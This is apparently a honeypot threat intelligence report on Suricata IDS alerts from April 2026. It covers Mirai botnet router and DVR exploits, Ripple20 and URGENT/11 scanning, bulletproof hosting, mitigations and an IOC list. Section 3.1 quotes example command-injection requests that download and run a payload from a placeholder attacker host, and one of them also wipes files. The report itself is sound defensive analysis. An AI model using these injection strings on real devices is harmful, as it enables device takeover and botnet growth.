Suricata IDS catching everything on the wire.

# Threat Intelligence Report: Suricata IDS Alert Intelligence (NadSec - 2026-04)

**Key Points:**
*   **Massive Exploitation of Legacy Vulnerabilities:** Threat actors are heavily leveraging established vulnerabilities, specifically targeting the Comtrend VR-3033 routers (CVE-2020-10173) and the JAWS Webserver (CVE-2016-20016), as primary vectors for IoT botnet propagation.
*   **Widespread Ripple20 Reconnaissance:** Telemetry indicates a highly coordinated, large-scale scanning operation mapping the internet for devices susceptible to the Treck TCP/IP stack "Ripple20" vulnerabilities, particularly focusing on IP-in-IP tunneling memory corruption (CVE-2020-11900).
*   **Bulletproof Hosting Dominance:** Over 63% of the total network alert volume originates from a single Autonomous System (AS202425 - IP Volume Inc.), a known bulletproof hosting entity associated with aggressive, high-volume brute-force and scanning campaigns.
*   **Decentralized Botnet Infrastructure:** Analysis of incoming exploit attempts reveals a globally distributed attack infrastructure, heavily reliant on compromised residential broadband and cellular networks in Pakistan, China, and Taiwan.

**Executive Summary:**
This comprehensive threat intelligence report delineates the findings derived from the NadSec T-Pot honeypot infrastructure deployed in Sydney, Australia, for the period of April 2026. The sensor, utilizing Suricata Intrusion Detection System (IDS) telemetry, captured a total of 2,429 security alerts originating from 104 uniquely identified IPv4 addresses. The analysis of this dataset reveals a persistent and evolving threat landscape dominated by automated botnet operators, bulletproof hosting syndicates, and opportunistic exploit scanners. While zero unique file hashes or URLs were extracted—indicative of initial-stage reconnaissance and pre-authentication exploit delivery rather than post-compromise payload staging—the network signatures paint a clear picture of the adversary's intent. The data underscores a strategic shift by botnet operators (such as the Mirai and Gafgyt families) to continuously integrate newly weaponized and legacy common vulnerabilities and exposures (CVEs) into their arsenals to maximize their infrastructural footprint.

---

## 1. Statistical Overview and Telemetry Analysis

The data gathered during April 2026 presents a distinct geographic and infrastructural distribution of malicious traffic. While the raw event count stands at 2,429, analyzing the distribution of these events yields critical insights into the methodologies employed by contemporary threat actors. 

### 1.1 Geographic Distribution of Threat Actors

The geographic origin of the attacks is heavily skewed toward a few key jurisdictions, largely dictated by the physical location of abused hosting providers and regions with high concentrations of insecure Internet of Things (IoT) devices.

| Country | Event Count | Percentage of Total | Primary Attack Modus Operandi |
| :--- | :--- | :--- | :--- |
| **Netherlands** | 1,546 | 63.6% | High-volume scanning, RDP/VPN Brute-forcing |
| **United States** | 575 | 23.6% | Cloud infrastructure abuse, Ripple20 scanning |
| **China** | 72 | 2.9% | Mirai botnet propagation, JAWS exploits |
| **Pakistan** | 53 | 2.2% | Residential IoT botnet nodes (Mirai) |
| **Taiwan** | 42 | 1.7% | Embedded systems targeting (URGENT/11) |
| **India** | 30 | 1.2% | General IoT vulnerability scanning |
| **Australia** | 14 | 0.5% | Domestic compromised infrastructure |

*Note: The remaining 97 events are distributed across Brazil, Germany, Algeria, the UK, and various other nations.*

### 1.2 Autonomous System Network (ASN) Infrastructure

The analysis of ASNs reveals a stark contrast between dedicated malicious hosting environments and compromised legitimate infrastructure. 

| ASN | Organization Name | Event Count | Classification |
| :--- | :--- | :--- | :--- |
| **AS202425** | IP Volume inc | 1,546 | Bulletproof Hosting / Cybercriminal Transit |
| **AS6939** | Hurricane Electric LLC | 434 | Cloud Abuse / Reconnaissance Staging |
| **AS6181** | Cincinnati Bell Telephone Company LLC | 50 | Compromised ISP / Residential |
| **AS3462** | Data Communication Business Group | 42 | Compromised ISP / Residential |
| **AS9541** | Cyber Internet Services Pvt Ltd. | 41 | Compromised ISP / Residential |
| **AS4538** | China Education and Research Network | 29 | Academic / Compromised Edge |
| **AS4837** | CHINA UNICOM China169 Backbone | 22 | Compromised ISP / Residential |

### 1.3 Signature and Protocol Targeting

The Suricata IDS signatures triggered during this period highlight the specific technological stacks targeted by adversaries. The targeting heavily favors unauthenticated remote code execution (RCE) and command injection flaws in edge devices.

| Top Suricata Signatures Triggered | Event Count | Target Category |
| :--- | :--- | :--- |
| ET SCAN Mirai Variant User-Agent (Inbound) | 33 | IoT Botnet |
| ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free | 25 | Ripple20 / Embedded TCP/IP |
| ET EXPLOIT Possible Authenticated Command Injection Inbound - Comtrend VR-3033 (CVE-2020-10173) | 22 | Edge Router / Mirai Variant |
| SURICATA HTTP missing Host header | 21 | Generic Protocol Anomaly |
| GPL SCAN loopback traffic | 14 | Reconnaissance / IP Spoofing |
| ET EXPLOIT Possible CVE-2020-11910 anomalous ICMPv4 type 3,code 4 | 6 | Ripple20 / Embedded TCP/IP |
| ET SCAN JAWS Webserver Unauthenticated Shell Command Execution | 3 | IoT Botnet (UNSTABLE/Mirai) |

### 1.4 Targeted Ports Distribution

An analysis of the destination ports targeted by the incoming malicious traffic corroborates the signature data, demonstrating a clear focus on HTTP/HTTPS management interfaces and standard remote administration protocols.

*   **Port 80 (40 events):** Predominantly targeted for HTTP-based command injection exploits (e.g., CVE-2020-10173, JAWS Webserver).
*   **Port 3389 (7 events):** Microsoft Remote Desktop Protocol (RDP), primarily targeted by AS202425 (IP Volume Inc.) for brute-force operations.
*   **Port 443 (7 events):** HTTPS targeting, often associated with SSL VPN brute-forcing and secure web interface exploitation.
*   **Port 49152 (7 events):** A common ephemeral port often utilized by Universal Plug and Play (UPnP) services, frequently targeted by Mirai variants for lateral movement.
*   **Ports 5555 / 8080 / 9200 (5 events each):** Often associated with Android Debug Bridge (ADB), alternate HTTP management panels, and Elasticsearch, respectively.

---

## 2. Infrastructure Deep Dive

The architectural foundation of the attacks logged by the NadSec honeypot can be categorized into three distinct operational models: Bulletproof Hosting Operations, Cloud Infrastructure Abuse, and Decentralized Residential Botnets.

### 2.1 Bulletproof Hosting Operations: IP Volume Inc. (AS202425)

The most striking statistical anomaly in the dataset is the sheer volume of traffic originating from AS202425, registered to **IP Volume Inc.** While representing only a single IP address in the sampled extract (`94.102.49.51`), this ASN is responsible for an overwhelming 1,546 out of the 2,429 total alerts (63.6%). 

Threat intelligence research reveals that IP Volume Inc. is a Seychelles-registered entity that operates physical server infrastructure predominantly in the Netherlands [cite: 1, 2]. The organization serves as a front for the notorious Ecatel network (along alongside other aliases such as Quasi Networks and Novogara), which has historically been classified as one of the most prolific bulletproof hosting providers globally [cite: 1, 2]. 

Bulletproof hosting providers deliberately ignore abuse complaints and offer a safe haven for cybercriminals to orchestrate large-scale automated attacks. Recent threat intelligence reports indicate that IP Volume Inc. acts as the primary transit provider for a sophisticated abusive network that frequently utilizes prefix swapping—rapidly re-announcing IPv4 blocks across different ASNs (such as FDN3, KPROHOST, and VAIZ-AS) to evade traditional IP-based blocklists and sinkholes [cite: 3, 4]. 

The primary modus operandi of this infrastructure involves sustained, high-velocity brute-force and password-spraying attacks targeting Secure Sockets Layer (SSL) Virtual Private Networks (VPNs) and Remote Desktop Protocol (RDP) endpoints [cite: 3, 4]. This is directly corroborated by the NadSec dataset, wherein the IP `94.102.49.51` triggered the `ET REMOTE_ACCESS Tunneled RDP msts Handshake` signature on Port 61871. Furthermore, historical data indicates this ASN is heavily involved in aggressive background scanning of the internet, leveraging tools like SipVicious for SIP server discovery and EternalBlue (CVE-2017-0144) for SMB exploitation [cite: 1, 5]. The operational tempo—often reaching hundreds of thousands of login attempts per hour—suggests an automated, highly resourced initial access broker (IAB) campaign [cite: 3, 5].

### 2.2 Cloud Infrastructure Abuse: Hurricane Electric (AS6939)

The second most prominent source of malicious traffic stems from **Hurricane Electric LLC (AS6939)**, accounting for 434 total alerts. Analysis of the sampled IP addresses reveals a massive, coordinated block of Hurricane Electric infrastructure (`64.62.197.94`, `184.105.247.248`, `65.49.20.100`, `65.49.1.47`, `184.105.139.119`, among dozens of others) dedicated almost entirely to a singular task: scanning for the **Ripple20** vulnerability (CVE-2020-11900 IP-in-IP tunnel Double-Free).

Unlike bulletproof hosting, Hurricane Electric is a legitimate and foundational Tier 1 internet service provider. The presence of this traffic indicates "cloud abuse," wherein threat actors purchase or compromise virtual private servers (VPS) within the provider's network to leverage their massive bandwidth and peering agreements. The use of cloud infrastructure allows adversaries to conduct rapid, internet-wide asynchronous scanning (likely utilizing tools like ZMap or Masscan) to map vulnerable Treck TCP/IP stacks before the hosting provider's automated abuse mechanisms can identify and terminate the offending instances.

### 2.3 The Decentralized Residential Botnet

A secondary, yet highly critical, layer of attack infrastructure is observed originating from consumer-grade Internet Service Providers (ISPs) and telecommunications companies in the Global South and Asia. 

IP addresses originating from entities such as **Cyber Internet Services Pvt Ltd.** in Pakistan (`175.107.208.22`, `119.30.116.198`), **CHINA UNICOM** (`115.58.133.187`, `42.236.213.216`), and various Indian, Taiwanese, and South American ISPs triggered a highly specific set of signatures. These signatures are overwhelmingly tied to the **ET SCAN Mirai Variant User-Agent (Inbound)** and targeted edge-router exploits like the Comtrend VR-3033 vulnerability. 

This traffic pattern is the hallmark of a decentralized residential botnet. Threat actors compromise edge devices (routers, digital video recorders, IP cameras) using automated exploitation. Once compromised, these low-powered edge devices become "bots" that are immediately instructed by a Command and Control (C2) server to begin scanning the internet for other vulnerable devices [cite: 6, 7]. Because these attacks originate from legitimate residential IPs, they are notoriously difficult to block via geo-fencing or ASN reputation without causing significant collateral damage to legitimate web traffic.

### 2.4 Anomalous Corporate & State Infrastructure

A fascinating anomaly within the dataset is the presence of the `GPL SCAN loopback traffic` signature originating from highly reputable networks, including the **United States Department of Defense (DoD)** (`131.66.226.48`, `128.26.175.217`), **Verizon Business** (`71.102.182.162`), and **Amazon.com, Inc.** (`3.95.117.192`). 

Loopback traffic (data seemingly sent from the 127.0.0.0/8 range, or packets with matching source and destination headers) routed over the public internet is inherently malformed. While it is possible that these are misconfigured enterprise security scanners, it is highly probable that this is **spoofed source traffic**. Adversaries frequently spoof the source IP address of UDP or ICMP packets during reconnaissance to elicit backscatter, perform denial-of-service reflection attacks, or obscure the true origin of a network mapping project.

---

## 3. Malware & Exploit Analysis

While no executable payloads (hashes) were successfully extracted by the honeypot during this period, the Suricata signature metadata provides a definitive forensic trail of the malware families orchestrating these attacks. The landscape is dominated by the continuous evolution of the Mirai ecosystem and the exploitation of deeply embedded networking stacks.

### 3.1 Mirai & Gafgyt Ecosystem Evolution

The Mirai botnet, originally discovered in 2016 and notorious for executing some of the largest Distributed Denial of Service (DDoS) attacks in history, remains a persistent threat due to the public leak of its source code [cite: 6, 7, 8]. Since the leak, countless variants (e.g., Satori, Mukashi, Omni, Moobot) have emerged [cite: 6, 8, 9]. While early iterations of Mirai relied heavily on brute-forcing default Telnet and SSH credentials (e.g., "admin/password") [cite: 6], modern variants rely almost exclusively on integrating the latest unauthenticated remote code execution vulnerabilities [cite: 6, 7, 10].

#### 3.1.1 Comtrend VR-3033 Exploitation (CVE-2020-10173)
The dataset recorded 22 distinct exploitation events targeting CVE-2020-10173. This is a Multiple Authenticated Command Injection vulnerability residing in the diagnostic ping and traceroute pages of Comtrend VR-3033 routers [cite: 7, 8, 10]. Security researchers at Trend Micro identified a specific Mirai variant (detected as `IoT.Linux.MIRAI.VWISI`) that weaponized this vulnerability in mid-2020 [cite: 10, 11]. 

The exploit is relatively trivial to execute remotely. Attackers craft an HTTP GET request to the `/ping.cgi` endpoint, appending malicious shell commands separated by semicolons to the `pingIpAddress` parameter (e.g., `GET /ping.cgi?pingIpAddress=google.fr;wget http://[malicious_IP]/payload -O -> /tmp/file;sh /tmp/file`) [cite: 7]. This allows the attacker to force the router to download and execute the Mirai payload compiled for its specific architecture (typically MIPS or ARM), fully compromising the network managed by the router [cite: 7, 8]. The presence of this exploit across diverse geographic nodes in the dataset proves that botnet developers continuously cast a wide net, capitalizing on the fact that users rarely patch consumer-grade ISP-provided routers [cite: 10].

#### 3.1.2 JAWS Webserver Exploitation (CVE-2016-20016)
The telemetry also captured attempts to exploit the JAWS Webserver Unauthenticated Shell Command Execution vulnerability (CVE-2016-20016). This aging vulnerability affects MVPower Digital Video Recorders (DVRs) and CCTV systems. The payload is typically delivered via a manipulated HTTP GET request to the `/shell` endpoint (e.g., `GET /shell?cd+/tmp;rm+-rf+*;wget+http://[C2]/jaws;sh+/tmp/jaws`) [cite: 12].

Despite the vulnerability dating back to 2016, it remains highly popular among modern botnets. Threat intelligence indicates that the **UNSTABLE Botnet** (a Mirai variant) and the **Omni Botnet** actively utilize this exploit [cite: 9, 12, 13, 14]. These botnets have increasingly shifted toward utilizing legitimate cloud computing and storage services to host their payloads and Command and Control (C2) servers, granting them resilience and scalability against traditional takedowns [cite: 13, 14, 15].

### 3.2 Ripple20 (Treck TCP/IP Stack) Mass Exploitation

One of the most concerning findings in the April 2026 dataset is the high volume of traffic targeting the "Ripple20" vulnerabilities. Ripple20 represents a collection of 19 zero-day vulnerabilities discovered in 2020 by the JSOF research team within the Treck TCP/IP stack [cite: 16, 17]. The Treck stack is a widely deployed, low-level embedded networking library utilized in hundreds of millions of IoT devices, medical equipment, industrial control systems (ICS), and enterprise printers [cite: 16, 17, 18]. 

#### 3.2.1 CVE-2020-11900 (IP-in-IP tunnel Double-Free)
The dataset recorded 25 specific events triggering the `ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free` signature. This vulnerability, carrying a CVSS severity score of 8.2 (High), is a memory corruption flaw (Double Free - CWE-415) located within the IPv4 tunneling component of the Treck stack [cite: 19, 20]. An unauthenticated network attacker can craft malicious IP-in-IP packets that induce the stack to free the same memory allocation twice. This can lead to unexpected memory access, allowing the attacker to potentially read or write values in arbitrary memory spaces, leading to Remote Code Execution (RCE) [cite: 19, 21].

*Technical Note on Detection:* The Suricata rule designed to detect this (SID 2030388) is known to be highly sensitive, as it matches broadly on packets utilizing IP Protocol 4 (IP-in-IP encapsulation) [cite: 22, 23]. While this can occasionally lead to false positives in environments that legitimately use IP-in-IP routing, the highly concentrated burst of these packets originating from specific subnets within Hurricane Electric strongly indicates systematic, automated vulnerability mapping rather than benign misconfigurations. 

#### 3.2.2 CVE-2020-11910 (ICMPv4 Out-of-bounds Read)
The telemetry also identified 6 events targeting CVE-2020-11910. This is an Out-of-Bounds Read vulnerability (CWE-125) triggered during the processing of Internet Control Message Protocol version 4 (ICMPv4) packets [cite: 16, 24]. The root cause is insufficient bounds checking; the vulnerable Treck code fails to properly validate the length field of incoming ICMP packets against the allocated buffer size [cite: 16]. By sending specially crafted ICMPv4 packets with manipulated length values (such as anomalous Path MTU Discovery packets), an attacker can force the stack to read memory beyond the packet buffer, potentially exposing highly sensitive data residing in adjacent memory regions [cite: 16, 25].

### 3.3 URGENT/11 (VxWorks RTOS)

The dataset captured instances (`1.34.85.243`) attempting to exploit the **URGENT/11** vulnerabilities. Discovered by Armis Labs, URGENT/11 is a set of 11 critical vulnerabilities affecting the IPnet TCP/IP stack within the VxWorks Real-Time Operating System (RTOS) [cite: 26, 27, 28]. VxWorks is ubiquitous in critical infrastructure, spanning firewalls (e.g., SonicWall), medical patient monitors, and industrial controllers [cite: 26, 27].

The exploit techniques observed in the dataset involve the manipulation of the TCP "Urgent Flag." Because the Urgent Pointer is a built-in, fundamental feature of the TCP protocol, intermediate networking gear—such as NAT routers and perimeter firewalls—typically pass these malformed packets through to the internal network completely intact [cite: 28]. This allows external attackers to bypass perimeter security entirely and directly compromise embedded devices deep within corporate networks, executing code without any user interaction [cite: 26, 27, 28].

---

## 4. Campaign Analysis

Synthesizing the infrastructure data and the malware behavioral analysis yields a clear picture of three distinct, concurrent threat campaigns operating during the April 2026 observation window.

### Campaign 1: The Multi-Exploit IoT Botnet Expansion
This campaign is characterized by the global, decentralized network of compromised edge devices actively seeking out new nodes. The attackers behind this campaign are operating advanced variants of the Mirai malware (likely `IoT.Linux.MIRAI.VWISI` or similar derivatives) [cite: 10, 11]. They demonstrate a high degree of agility, rapidly cycling through multiple exploits—including Comtrend CVE-2020-10173, JAWS CVE-2016-20016, and various UPnP SOAP executions [cite: 7, 12, 14]. The strategy is highly opportunistic; by casting a wide net encompassing old and newly discovered vulnerabilities, the botnet operators ensure a constant supply of newly enslaved devices to replace those that are remediated or taken offline [cite: 10]. The ultimate goal of this campaign is resource agglomeration, amassing processing power and bandwidth to lease out as a Distributed Denial of Service (DDoS) for hire (booter) service [cite: 6, 7, 15].

### Campaign 2: Targeted Industrial/Embedded Reconnaissance (Ripple20)
In contrast to the noisy, decentralized Mirai scanning, the Ripple20 campaign is highly centralized, originating almost entirely from rented cloud infrastructure within the United States (Hurricane Electric). This campaign does not appear to be delivering an immediate payload; rather, it is an exhaustive, internet-wide mapping initiative. Threat actors are utilizing malformed IP-in-IP and ICMPv4 packets to identify hosts running the vulnerable Treck TCP/IP stack [cite: 16, 19]. Given the difficulty of reliably exploiting these memory corruption flaws without specific tailoring for the target device's architecture [cite: 29], this campaign is likely operated by an Advanced Persistent Threat (APT) group or a highly sophisticated Initial Access Broker. They are compiling databases of vulnerable critical infrastructure endpoints for future, targeted exploitation or sale on the dark web.

### Campaign 3: Aggressive Credential Harvesting via Bulletproof Transit
Operating autonomously from the IoT botnets, a dedicated cybercriminal syndicate is leveraging the IP Volume Inc. (Ecatel) infrastructure to conduct sustained, high-volume brute-force attacks [cite: 1, 3]. This campaign targets enterprise remote access solutions—specifically RDP and SSL VPNs—using exhaustive password spraying techniques designed to evade standard account lockout thresholds [cite: 3, 4]. The operators exhibit deep technical sophistication in their infrastructure management, seamlessly rotating through allocated IPv4 prefix blocks to bypass threat intelligence feeds and IP reputation blacklists [cite: 3, 4]. 

---

## 5. Detection and Mitigation Strategies

Defending against this multifaceted threat landscape requires a defense-in-depth approach, combining strict perimeter controls, aggressive patch management, and fine-tuned intrusion detection capabilities.

### 5.1 Perimeter Controls and Network Segmentation
1.  **IoT Isolation:** As demonstrated by the Comtrend and JAWS exploits, consumer-grade IoT devices are inherently insecure and rarely patched [cite: 10]. All IoT devices, IP cameras, and smart appliances must be logically segregated onto a dedicated Virtual Local Area Network (VLAN) with strict Access Control Lists (ACLs) preventing them from initiating outbound connections to the internet or routing traffic to the internal corporate LAN [cite: 10].
2.  **Management Interface Obfuscation:** Web-based management panels (Port 80/443) for routers and firewalls must never be exposed to the public internet. Access should require connection to a secure, multi-factor authenticated VPN.
3.  **Protocol Filtering:** To defend against URGENT/11 and Ripple20, perimeter firewalls should be configured to aggressively drop malformed packets. This includes dropping TCP packets with anomalous Urgent Pointers, blocking unexpected IP-in-IP encapsulated traffic (Protocol 4) unless explicitly required for business operations, and strictly rate-limiting ICMPv4 traffic [cite: 28, 29].

### 5.2 IDS/SIEM Tuning
The NadSec honeypot relies on Suricata. To maximize the efficacy of these alerts in a production environment:
1.  **Ripple20 Tuning:** The `ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free` (SID 2030388) rule matches broadly on IP protocol 4 [cite: 22, 23]. In a SIEM, this alert should be correlated with the destination asset. If the destination asset is known *not* to run the Treck TCP/IP stack, the alert can be suppressed or downgraded to "Reconnaissance." 
2.  **Bulletproof Hosting Blacklisting:** Organizations should ingest dynamic Threat Intelligence Platforms (TIP) to preemptively block all ingress traffic from ASNs known exclusively for bulletproof hosting and cybercrime. Traffic originating from AS202425 (IP Volume Inc.) should be dropped at the edge via BGP blackholing or edge firewall rules, as it serves no legitimate business purpose [cite: 1, 3].

---

## 6. MITRE ATT&CK Mapping

The behaviors observed in the Suricata telemetry map directly to several tactics and techniques within the MITRE ATT&CK framework.

| Tactic | Technique (T-Code) | Description | Observation in Dataset |
| :--- | :--- | :--- | :--- |
| **Reconnaissance** | T1595.001 (Active Scanning) | Scanning IP blocks to identify exposed services. | Pervasive scanning for open ports 80, 8080, and 49152; Ripple20 mapping via Hurricane Electric. |
| **Resource Development** | T1583.003 (Virtual Private Server) | Procuring VPS infrastructure. | Use of DigitalOcean and Hurricane Electric for staging attacks. |
| **Resource Development** | T1583.004 (Bulletproof Hosting) | Utilizing hosting that ignores abuse. | The 1,546 events linked to IP Volume Inc. / Ecatel [cite: 1, 2]. |
| **Initial Access** | T1190 (Exploit Public-Facing Application) | Exploiting software vulnerabilities. | Comtrend VR-3033 (CVE-2020-10173), JAWS (CVE-2016-20016) [cite: 10, 13]. |
| **Initial Access** | T1078 (Valid Accounts) | Brute-forcing remote access. | RDP and SSL VPN password spraying via AS202425 [cite: 3]. |
| **Execution** | T1059.004 (Unix Shell) | Executing payload via shell commands. | Semicolon-separated shell injections in Comtrend `ping.cgi` and JAWS `/shell` URI [cite: 7, 12]. |
| **Lateral Movement** | T1210 (Exploitation of Remote Services) | Exploiting internal vulnerabilities. | URGENT/11 and Ripple20 designed to bypass NAT and move laterally to internal ICS/IoT [cite: 26, 28]. |

---

## 7. IOC Appendix

The following IP addresses were extracted from the Suricata telemetry and categorized by their primary observed threat activity.

**Bulletproof Hosting / Aggressive Brute-Force (IP Volume Inc.)**
*   `94.102.49.51` (NL, AS202425) - RDP/VPN Brute-force operations.

**Mirai Variant & IoT Botnet Nodes (Targeting Comtrend, JAWS, and general IoT flaws)**
*   `115.58.133.187` (CN, CHINA UNICOM)
*   `120.240.178.134` (CN, China Mobile)
*   `42.236.213.216` (CN, CHINA UNICOM)
*   `175.107.208.22` (PK, Cyber Internet Services)
*   `119.30.116.198` (PK, IX Peering)
*   `103.93.93.182` (ID, PT Jinde Grup)
*   `117.244.67.83` (IN, National Internet Backbone)
*   `176.235.182.142` (TR, Superonline)
*   `186.209.190.84` (BR, NOVACIA TECNOLOGIA)
*   `5.38.0.213` (AE, Emirates Telecommunications)
*   `120.85.113.142` (CN, China Unicom - JAWS)
*   `103.38.53.17` (IN, Userlinks Netcom - JAWS)
*   `45.230.66.124` (AR, MEGALINK S.R.L. - JAWS)

**Ripple20 Reconnaissance Scanners (Cloud Infrastructure Abuse)**
*   *Hurricane Electric LLC (US, AS6939):* `64.62.197.94`, `184.105.247.248`, `64.62.197.169`, `65.49.20.100`, `65.49.1.47`, `65.49.20.111`, `65.49.1.112`, `64.62.156.141`, `65.49.1.196`, `65.49.1.214`, `65.49.1.141`, `184.105.247.244`, `184.105.139.119`, `64.62.197.55`, `64.62.156.149`, `64.62.197.8`, `64.62.156.133`, `64.62.197.225`, `74.82.47.28`, `184.105.247.214`, `65.49.1.127`, `64.62.156.193`, `184.105.139.109`, `64.62.197.99`.
*   *Other Providers:* `102.129.152.194` (US, Cogent), `185.35.147.27` (DE, CloudKleyer).

**URGENT/11 Exploitation Attempt**
*   `1.34.85.243` (TW, Data Communication Business Group)

**Anomalous Spoofed / Backscatter Traffic (GPL SCAN Loopback)**
*   `131.66.226.48` (US, DoD)
*   `128.26.175.217` (US, DoD)
*   `3.95.117.192` (US, Amazon)
*   `51.244.213.167` (US, Amazon)
*   `71.102.182.162` (US, Verizon)

---

## 8. Sources and Citations

The following threat intelligence references were synthesized to provide context and technical analysis for the observed network telemetry:

*   **[cite: 10]** Trend Micro Research (2020). *New Mirai Variant Expands Arsenal, Exploits CVE-2020-10173*. Details the integration of Comtrend router vulnerabilities into Mirai architecture to compromise internal networks.
*   **[cite: 8]** Security Affairs (2020). *Researchers spotted a new version of the Mirai IoT botnet that includes an exploit for a vulnerability affecting Comtrend routers*. Discusses the rapid weaponization of CVE-2020-10173 by DDoS operators.
*   **[cite: 6]** Center for Internet Security (CIS) (2021). *The Mirai Botnet: Threats and Mitigations*. Provides historical context on Mirai's shift from credential brute-forcing to sophisticated CVE exploitation.
*   **[cite: 7]** CUJO AI (2021). *IoT Botnet Report: Malware and Vulnerabilities Targeted*. Contains technical breakdowns of the specific GET request formatting utilized in the Comtrend CVE-2020-10173 exploit.
*   **[cite: 16]** SentinelOne (2026). *CVE-2020-11910 Overview*. Technical analysis of the Out-of-Bounds read vulnerability within the Treck TCP/IP stack handling ICMPv4.
*   **[cite: 24]** Rapid7 (2020). *CVE-2020-11910: ICMPv4 Out-of-bounds Read in Treck TCP/IP stack (Ripple20)*. Evaluates the severity and network impact of the vulnerability.
*   **[cite: 25]** National Vulnerability Database (2020). *CVE-2020-11910 Detail*. Official vulnerability enumeration for the Treck ICMPv4 flaw.
*   **[cite: 13]** Eventus Security (2026). *Cloud-Based Botnets UNSTABLE, Condi, and Skibidi Exploit Vulnerabilities*. Outlines the modern exploitation of the JAWS Webserver (CVE-2016-20016) by advanced cloud-resilient botnets.
*   **[cite: 12]** Palo Alto Networks Unit 42 (2018). *Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns*. Details the historical adoption of the JAWS exploit and D-Link vulnerabilities by early Gafgyt/Mirai offshoots.
*   **[cite: 14]** Fortinet FortiGuard Labs (2024). *The Growing Threat of Malware Concealed Behind Cloud Services*. Analyzes the UNSTABLE Botnet's initial access vectors targeting JAWS Webservers.
*   **[cite: 15]** InfoSecurity Magazine (2024). *Attackers Abuse Cloud Services to Deploy Malware*. Confirms the strategic shift of botnet operators utilizing cloud computing to scale DDoS operations.
*   **[cite: 9]** SecurityWeek (2018). *Mirai, Gafgyt IoT Botnet Attacks Intensify*. Historical context on the convergence of Mirai and Gafgyt codebases.
*   **[cite: 18]** SentinelOne (2026). *CVE-2020-11899 Overview*. Associated Ripple20 vulnerability analysis regarding IPv6 processing.
*   **[cite: 30]** GitHub/vncloudsco (EmergingThreats Rules). Open source repository confirming the exact rule logic for SID 2030388 (IP-in-IP Double Free).
*   **[cite: 29]** AttackerKB (2020). *Ripple20: Treck TCP/IP Stack Vulnerabilities*. Discusses the practical difficulties of weaponizing Ripple20 for RCE without target-specific compilation, pointing toward mass scanning utility.
*   **[cite: 19]** CERT Coordination Center (2020). *VU#257161 - Treck TCP/IP stack contains multiple vulnerabilities*. Official vulnerability reporting for CVE-2020-11900.
*   **[cite: 26]** Armis Research (2020). *URGENT/11*. Details the 11 critical vulnerabilities in the VxWorks RTOS and their ability to bypass perimeter firewalls via the TCP Urgent flag.
*   **[cite: 27]** InfoSec Institute (2019). *URGENT/11 Vulnerability*. Explores specific attack scenarios targeting embedded ICS and medical devices via URGENT/11.
*   **[cite: 28]** Gibson Research Corporation (2019). *Security Now 725 Notes*. Technical breakdown of how the TCP Urgent pointer circumvents NAT and standard routing protocols.
*   **[cite: 1]** TEHTRIS (2022). *Focus on a Bulletproof Hosting Provider*. Analysis of AS202425 (IP Volume Inc.) and its historical rank as a prolific cybercriminal hoster.
*   **[cite: 5]** SANS Internet Storm Center (2020). *Diary 26912*. Details the aggressive scanning behaviors, DOS conditions, and origins of IP Volume Inc./Ecatel.
*   **[cite: 3]** CyberPress (2025). *SSL VPN and RDP Attacks Surge*. Documents the specific prefix-swapping tactics employed by IP Volume Inc. to facilitate sustained brute-force campaigns against enterprise networks.
*   **[cite: 1]** TEHTRIS (2022). *Focus on a Bulletproof Hosting Provider*. Corroborates the Seychelles registration and Netherlands physical presence of AS202425.
*   **[cite: 4]** Intrinsec (2025). *VAIZ, FDN3, TK-NET: Ukrainian Networks Driving Brute Force Attacks*. Threat intelligence connecting IP Volume Inc. to a wider network of abusive autonomous systems.
*   **[cite: 2]** LowEndTalk (2022). *Who is IP Volume Inc?* Open source intelligence gathering regarding the operational structure of Ecatel and Novogara.
*   **[cite: 5]** SANS Internet Storm Center (2020). *Diary 26912*. Further confirmation of AS202425 hosting origins.
*   **[cite: 8]** Security Affairs (2020). Additional commentary on the Comtrend router exploitation by Trend Micro researchers.
*   **[cite: 11]** Trend Micro Threat Encyclopedia (2020). *IoT.Linux.MIRAI.VWISI*. Formal malware family designation and technical behavior profile for the Comtrend-exploiting Mirai variant.
*   **[cite: 10]** Trend Micro Research (2020). Re-iteration of the strategic advantage cybercriminals gain by exploiting unpatched edge devices.
*   **[cite: 22]** EmergingThreats Community (2024). *Ruleset Update Summary*. Confirms the active deployment and maintenance of the Ripple20 detection signatures within Suricata.
*   **[cite: 23]** Information Security Stack Exchange (2020). *Suricata Ripple20 rule for IP-in-IP resulting in 100M alerts*. Technical discussion regarding the high sensitivity of SID 2030388 matching on protocol 4 (IPIP).
*   **[cite: 17]** Forescout Research Labs (2020). *Ripple20 Vulnerability*. Overview of the JSOF discovery and the widespread nature of the Treck network stack.
*   **[cite: 20]** EFI Communities (2020). *Ripple20 vulnerability*. CVSS scoring breakdown for CVE-2020-11900 and related Treck flaws.
*   **[cite: 21]** Cisco Security Advisory (2020). *Multiple Vulnerabilities in Treck IP Stack Affecting Cisco Products*. Validates the threat of Ripple20 against enterprise-grade networking infrastructure.

**Sources:**
1. [tehtris.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGW9wATqaELGaPwUwi2Z-dgHd-k4Wgd1UPb7E-tnkafKZTDJloAloONYTKQwtyapsxu0LaKVr0Ld6Orm1corakjOrryZyuyaGyIQUs-EkLazWkLXg07rT0uHq4WD-7NIxM16hjn5yfphY6JZ8KccIPKwQnAIWTHzOIm-9Mh7sy476mAJBP8Iba7t8wMDkMdDhPXdivpIJoniCKETQ==)
2. [lowendtalk.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQG_fw3xMrx34xQAkmSLqPkLnFlO5Yv_ib1QIWIczCmKcRHXB3Lqgo0n3geBojB-xkagSzgXcWPWvwEq2RKRPdlWWXf2IKPjOmmj2amA9YT_Ad_7r6fI7ujpxn_bzCbJdmtqv_l5CPLhP1XpBZvondA-5QDO)
3. [cyberpress.org](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQG-mZu00aJWVFIDMb9v23AjUgpLS5FwrFZHPyiJShviFsfu2RPRxEAxGfEkuHEmjtyAQP5sY1IEs90ywwz1zwYYjbpRec0lw-rddIbn-1ywiZfbDl3PJBLXWE4YMA-grPEW)
